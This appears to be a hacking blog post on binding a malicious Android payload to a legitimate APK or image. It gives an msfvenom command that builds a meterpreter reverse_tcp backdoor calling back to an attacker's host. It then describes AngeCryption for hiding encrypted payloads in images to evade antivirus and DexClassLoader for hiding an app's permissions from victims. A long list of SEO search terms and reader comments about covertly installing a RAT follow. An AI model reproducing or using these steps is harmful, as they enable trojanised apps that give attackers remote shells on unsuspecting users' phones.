How to bind an Image with APK file

3
1015

Creating an malicious payload APK is just a piece of cake for penetration testers. The real process lies in hiding the payload Apk either by binding it with some other legit apps or by some other means. If you wish to bind apk with other app’s, you don’t really need any third party frameworks or tools since Msfvenom offers this function. Just hit,

msfvenom -x CameraSample.apk -p android/meterpreter/reverse_tcp
LHOST=192.168.1.76LPORT=4444-o CameraSample_backdoored.apk
Where ‘x’ is the location of the legit apk, -p is the payload and -o is name of the output file you want. But in order to get a complete access, the app must be able to control all permissions and should be detected by Antivirus. Also, victim must install the app and the app must be running in the background to get a persistent access. If the background apk gets killed, the attacker would loose the access even if he had installed persistence script. So we should make our payload more convincing without even a single doubt getting triggered fro  our victim. So hiding payload apps with image is the best option. Victim open’s the image and you get a shell… boom! Awesome right? So how to get this happen ? Is this really possible ? Let’s see below.
How to bind an Image with APK file :
As for now, the answer for the question “Is it possible to bind apk with jpg” is neither completely yes nor completely no. Because even though there are not certain method to bind apk with jpg, it’s possible to inject any encrypted input into a image file. Using a tool called AngeCryption, it’s possible to inject encrypted malicious payload in PNG, JPG, PDF, and FLV files. In scope of Windows Penetration tetsing, Security tools available nowadays are designed to bind the malicious .exe file with pdf whereas AngeCrption inject the trojan directly into the executable making it hard to detect by the antivirus family. All kind of metasploit as well as other paylaods can be encrypted and injected into the normal apk which looks legit. Say for example, if the attacker creates a Wallpaper app and inserts an Malicious JPG file into that app, no AV will possibly detect the existence of this loophole. This can be perfectly conceived by using AngeCryption. Here’s the Github repo for AngeCryption. https://github.com/indrora/corkami/tree/master/src/angecryption. 
To learn more about angecryption and binding apk with jpg, Download’s Ange’s whitepaper on BlackHat 2014 here. Alright, but what if the victim’s suspects the Application by doubting it’s permissions since it would request a lot of permission. Here, we bring you solution for that question.
How to Hide android app’s permissions :
Using DexClassLoader, an attacker can successfully hide the second app’s permission under the first app so the victim wont get specious by viewing the permission at the time of installation. This tool has been successfully tested on Android 4.2.2. But sources said that, this bug was patched on the later android versions.
Incoming search terms :
bind apk with picture,
how to bind apk file with image,
bind apk with image,
how to bind apk with image,
bind apk to image,
bind apk to picture,
bind apk with image,
how to bind apk with image,
how to bind apk file with image,
download do directory bind apk,
how to bind apk files,
how to bind apk,
how to bind apk with image,
how to bind apk file with image,
how to use directory bind apk,
bind apk files,
bind apk with image,
bind apk to jpg,
bind apk with another apk,
bind apk with payload,
bind apk with picture,
directory bind apk download,
directory bind apk free download,
dictionary bind apk,
directory bind apk4fun,
bind apk,
bind apk to apk,
directory bind android apk download,
directory bind android apk full,
bind with another apk,
directory bind app apk,
android bind apk,
directory bind apk android,
download directory bind android apk full,
directory bind apk chomikuj,
directory bind download apk,
directory bind apk no root,
directory bind apk free,
droidjack bind apk,
dictionary bind apk free download,
drectory bind apk,
directory bind descargar apk,
directory bind apk 2014,
directory bind apk español,
how to bind apk file with image,
folder bind apk,
directory bind apk full,
directory bind apk full download,
descargar directory bind apk full 2015,
descargar directory bind apk gratis,
directory bind apk gratis,
bind apk in image,
directory bind apk indir,
directory bind jb apk,
baixar directory bind jb apk,
kali bind apk,
directory bind apk latest version,
apkmania directory bind,
descargar directory bind apk mega,
directory bind apk mega,
directory bind apk pro,
download directory bind pro apk,
directory bind apk sin root,
social bind apk,
bind apk to picture,
bind apk to image,
bind two apk,
bind two apk together,
download directory bind apk terbaru,
directory bind apk terbaru,
directory bind apk tutorial,
directory bind apk uptodown,
directory bind apk ultima version,
directory bind v0.2.0 apk,
bind apk with apk,
directory bind apk xda,
directory bind 0.2.0k.apk,
directory bind 0.2.0o.apk,
directory bind 0.2.0 apk,
bind 2 apk,
bind 2 apk files,
directory bind apk 2015,
directory bind apk full 2015,
directory bind apk 4sh,

3 COMMENTS

  1. The GitHub comments on AngeCryption say it doesn’t work anymore and is there not a process where a victim received an image and the RAT exceutes without permissions?

    Any thoughts on the Android update in March and April 2018 interfering with the victim receiving a SMS with a image or link to download and install covertly?

    • Yup, as you said, AngeCryption doesn’t work anymore. The last android version on which AngeCryption worked was 4.2.2 and later, Android has patched the bug on their next release. So AngeCryption doesn’t work.

LEAVE A REPLY

Please enter your comment!
Please enter your name here

This site uses Akismet to reduce spam. Learn how your comment data is processed.